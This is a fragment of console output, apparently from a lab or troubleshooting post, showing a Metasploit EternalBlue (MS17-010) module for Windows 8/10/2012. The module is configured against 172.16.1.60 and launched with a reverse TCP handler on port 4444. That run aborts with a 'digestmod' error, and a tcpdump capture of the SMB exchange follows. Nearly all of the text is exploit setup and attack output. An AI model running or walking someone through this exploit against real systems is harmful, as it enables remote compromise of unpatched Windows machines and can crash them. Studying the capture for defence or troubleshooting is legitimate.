  ProcessName       spoolsv.exe      no        Process to inject payload into.
  RHOST                              yes       Target server
  RPORT             445              yes       Target server port
  SMBPass                            no        (Optional) The password for the specified username
  SMBUser                            no        (Optional) The username to authenticate as

Payload information:

Description:
  EternalBlue exploit for Windows 8, Windows 10, and 2012 by sleepya
  The exploit might FAIL and CRASH a target system (depended on what is overwritten)
  The exploit support only x64 target
  Tested on:
  - Windows 2012 R2 x64
  - Windows 8.1 x64
  - Windows 10 Pro Build 10240 x64
  - Windows 10 Enterprise Evaluation Build 10586 x64
  Default Windows 8 and later installation without additional service info:
  - anonymous is not allowed to access any share (including IPC$)
  - More info: https://support.microsoft.com/en-us/help/3034016/ipc-share-and-null-session-behavior-in-windows

References:
  https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2017/MS17-010
  https://cvedetails.com/cve/CVE-2017-0143/
  https://cvedetails.com/cve/CVE-2017-0144/
  https://cvedetails.com/cve/CVE-2017-0145/
  https://cvedetails.com/cve/CVE-2017-0146/
  https://cvedetails.com/cve/CVE-2017-0147/
  https://cvedetails.com/cve/CVE-2017-0148/
  https://www.exploit-db.com/exploits/42030
  https://github.com/worawit/MS17-010

Also known as:
  ETERNALBLUE

msf5 exploit(windows/smb/ms17_010_eternalblue_win8) > set rhost 172.16.1.60
rhost => 172.16.1.60
msf5 exploit(windows/smb/ms17_010_eternalblue_win8) > options

Module options (exploit/windows/smb/ms17_010_eternalblue_win8):

   Name              Current Setting  Required  Description
   ----              ---------------  --------  -----------
   GroomAllocations  13               yes       Initial number of times to groom the kernel pool.
   ProcessName       spoolsv.exe      no        Process to inject payload into.
   RHOST             172.16.1.60      yes       Target server
   RPORT             445              yes       Target server port
   SMBPass                            no        (Optional) The password for the specified username
   SMBUser                            no        (Optional) The username to authenticate as

Exploit target:

   Id  Name
   --  ----
   0   win x64

msf5 exploit(windows/smb/ms17_010_eternalblue_win8) > run

[*] Started reverse TCP handler on 172.20.1.119:4444
[*] shellcode size: 1960
[*] numGroomConn: 13
[-] Missing required parameter 'digestmod'.
[-] Exploit aborted due to failure: unknown: Module exited abnormally
[*] Exploit completed, but no session was created.
```
```
tcpdump -i tun0 -n host 172.16.1.60
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on tun0, link-type RAW (Raw IP), capture size 262144 bytes
13:36:42.046252 IP 172.20.1.119.51008 > 172.16.1.60.445: Flags [S], seq 568799431, win 64240, options [mss 1460,sackOK,TS val 296807334 ecr 0,nop,wscale 7], length 0
13:36:42.294913 IP 172.16.1.60.445 > 172.20.1.119.51008: Flags [S.], seq 3814031721, ack 568799432, win 8192, options [mss 1358,nop,wscale 8,sackOK,TS val 40782235 ecr 296807334], length 0
13:36:42.294998 IP 172.20.1.119.51008 > 172.16.1.60.445: Flags [.], ack 1, win 502, options [nop,nop,TS val 296807583 ecr 40782235], length 0
13:36:42.296648 IP 172.20.1.119.51008 > 172.16.1.60.445: Flags [P.], seq 1:52, ack 1, win 502, options [nop,nop,TS val 296807585 ecr 40782235], length 51
13:36:42.602182 IP 172.16.1.60.445 > 172.20.1.119.51008: Flags [.], ack 52, win 257, options [nop,nop,TS val 40782261 ecr 296807585], length 0
13:36:42.602259 IP 172.16.1.60.445 > 172.20.1.119.51008: Flags [P.], seq 1:210, ack 52, win 257, options [nop,nop,TS val 40782261 ecr 296807585], length 209
13:36:42.602284 IP 172.20.1.119.51008 > 172.16.1.60.445: Flags [.], ack 210, win 501, options [nop,nop,TS val 296807890 ecr 40782261], length 0
13:36:42.610347 IP 172.20.1.119.51008 > 172.16.1.60.445: Flags [P.], seq 52:192, ack 210, win 501, options [nop,nop,TS val 296807898 ecr 40782261], length 140
13:36:42.909451 IP 172.16.1.60.445 > 172.20.1.119.51008: Flags [P.], seq 210:605, ack 192, win 257, options [nop,nop,TS val 40782291 ecr 296807898], length 395
13:36:42.909510 IP 172.20.1.119.51008 > 172.16.1.60.445: Flags [.], ack 605, win 501, options [nop,nop,TS val 296808198 ecr 40782291], length 0
13:36:42.919345 IP 172.20.1.119.51008 > 172.16.1.60.445: Flags [F.], seq 192, ack 605, win 501, options [nop,nop,TS val 296808208 ecr 40782291], length 0
13:36:43.216441 IP 172.16.1.60.445 > 172.20.1.119.51008: Flags [.], ack 193, win 257, options [nop,nop,TS val 40782322 ecr 296808208], length 0
13:36:43.216568 IP 172.16.1.60.445 > 172.20.1.119.51008: Flags [R.], seq 605, ack 193, win 0, length 0
```